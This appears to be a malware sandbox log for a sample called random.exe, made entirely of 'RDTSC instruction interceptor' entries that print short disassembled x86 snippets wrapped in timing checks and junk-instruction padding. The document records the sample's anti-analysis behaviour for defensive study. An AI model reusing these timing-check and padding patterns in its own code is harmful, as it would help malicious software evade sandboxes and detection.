Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A3F9 second address: 106A3FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106A3FF second address: 106A413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F4C44C2BE26h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1071163 second address: 107117F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A88h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107117F second address: 10711A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C44C2BE35h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4C44C2BE2Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 106FC4A second address: 106FC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070A25 second address: 1070A2B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070A2B second address: 1070A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4C45470A7Eh 0x0000000c jnp 00007F4C45470A76h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007F4C45470A86h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070A59 second address: 1070A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1014C18 second address: 1014C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4C45470A76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1014C24 second address: 1014C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jng 00007F4C44C2BE26h 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F4C44C2BE2Ah 0x00000015 jmp 00007F4C44C2BE33h 0x0000001a ja 00007F4C44C2BE26h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070FC2 second address: 1070FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1070FC6 second address: 1070FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F4C44C2BE37h 0x00000013 jmp 00007F4C44C2BE2Bh 0x00000018 jno 00007F4C44C2BE26h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107578D second address: 10757BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4C45470A76h 0x0000000a jnl 00007F4C45470A76h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F4C45470A76h 0x00000019 jmp 00007F4C45470A88h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10757BE second address: 10757E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Ch 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F4C44C2BE26h 0x00000016 jmp 00007F4C44C2BE2Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10757E7 second address: 107580A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C45470A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F4C45470A89h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107580A second address: 1075812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075812 second address: 1075816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075816 second address: 107581A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10356A9 second address: 10356AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1035C1A second address: 1035C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1035C1E second address: 1035C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1036098 second address: 10360EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C44C2BE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F4C44C2BE38h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4C44C2BE28h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 0000001Eh 0x0000002f sub cx, 8CC1h 0x00000034 nop 0x00000035 push ebx 0x00000036 push edi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10363C6 second address: 10363CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10363CC second address: 10363D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075AAC second address: 1075AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A86h 0x00000007 jmp 00007F4C45470A80h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4C45470A80h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075AEA second address: 1075AF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075AF4 second address: 1075B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4C45470A87h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4C45470A7Eh 0x00000015 jo 00007F4C45470A76h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4C45470A7Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075B3E second address: 1075B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075B44 second address: 1075B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1075F52 second address: 1075F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE2Ah 0x00000009 jmp 00007F4C44C2BE39h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4C44C2BE2Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1076104 second address: 107611A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jno 00007F4C45470A76h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107611A second address: 1076148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C44C2BE39h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F4C44C2BE2Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1076148 second address: 1076161 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C45470A78h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b jmp 00007F4C45470A7Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10765FD second address: 1076601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1076601 second address: 1076607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1078ECD second address: 1078ED7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C44C2BE2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1078ED7 second address: 1078EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F4C45470A76h 0x0000000c jl 00007F4C45470A76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B66D second address: 107B6ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4C44C2BE2Eh 0x00000010 jnp 00007F4C44C2BE26h 0x00000016 jmp 00007F4C44C2BE2Fh 0x0000001b popad 0x0000001c pop ebx 0x0000001d pushad 0x0000001e jmp 00007F4C44C2BE2Dh 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F4C44C2BE34h 0x0000002b jmp 00007F4C44C2BE2Eh 0x00000030 jmp 00007F4C44C2BE39h 0x00000035 popad 0x00000036 push esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BB29 second address: 107BB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BB31 second address: 107BB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BB3F second address: 107BB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007F4C45470A76h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BB55 second address: 107BB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080A27 second address: 1080A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080A2D second address: 1080A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE32h 0x00000007 jmp 00007F4C44C2BE2Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F4C44C2BE26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080A55 second address: 1080A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107FD74 second address: 107FD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107FD78 second address: 107FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4C45470A8Ch 0x0000000c jmp 00007F4C45470A80h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10802AA second address: 10802E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C44C2BE2Eh 0x00000007 jmp 00007F4C44C2BE32h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4C44C2BE38h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10802E8 second address: 10802EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080422 second address: 1080436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F4C44C2BE26h 0x0000000b jl 00007F4C44C2BE26h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080436 second address: 1080462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A83h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F4C45470A83h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080462 second address: 1080491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE33h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4C44C2BE32h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10850F3 second address: 1085113 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C45470A76h 0x00000008 jmp 00007F4C45470A86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10847D4 second address: 10847DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10847DA second address: 10847DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10847DF second address: 10847EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1084976 second address: 1084986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F4C45470A76h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FF4C3F second address: FF4C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1084DAF second address: 1084DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1084DB7 second address: 1084E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4C44C2BE37h 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F4C44C2BE39h 0x00000012 pop ebx 0x00000013 ja 00007F4C44C2BE28h 0x00000019 popad 0x0000001a jbe 00007F4C44C2BE46h 0x00000020 jo 00007F4C44C2BE2Ch 0x00000026 jng 00007F4C44C2BE26h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1084E0F second address: 1084E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1084E15 second address: 1084E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A595 second address: 108A5CA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C45470A76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 jno 00007F4C45470A76h 0x00000017 pop eax 0x00000018 jmp 00007F4C45470A86h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A724 second address: 108A747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F4C44C2BE37h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A747 second address: 108A77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4C45470A84h 0x0000000a jl 00007F4C45470A78h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4C45470A7Eh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A77B second address: 108A785 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C44C2BE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A785 second address: 108A7A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C45470A8Dh 0x00000008 js 00007F4C45470A76h 0x0000000e jmp 00007F4C45470A81h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A926 second address: 108A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A92A second address: 108A92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A92E second address: 108A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A937 second address: 108A94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A7Dh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108A94C second address: 108A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F4C44C2BE37h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AB01 second address: 108AB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AC79 second address: 108AC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C44C2BE2Ch 0x00000009 jg 00007F4C44C2BE26h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F4C44C2BE26h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1035E7C second address: 1035EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F4C45470A7Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108ADCD second address: 108ADD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C44C2BE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AF33 second address: 108AF56 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4C45470A8Ah 0x00000008 jmp 00007F4C45470A82h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AF56 second address: 108AF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AF5A second address: 108AF64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4C45470A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA10 second address: 108BA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA14 second address: 108BA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F4C45470A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F4C45470A76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA28 second address: 108BA2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA2E second address: 108BA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA34 second address: 108BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA38 second address: 108BA50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1094236 second address: 109423C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109423C second address: 109426C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C45470A83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4C45470A83h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109426C second address: 1094274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1094274 second address: 1094297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C45470A84h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jns 00007F4C45470A76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1092290 second address: 109229B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F4C44C2BE26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109229B second address: 10922A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
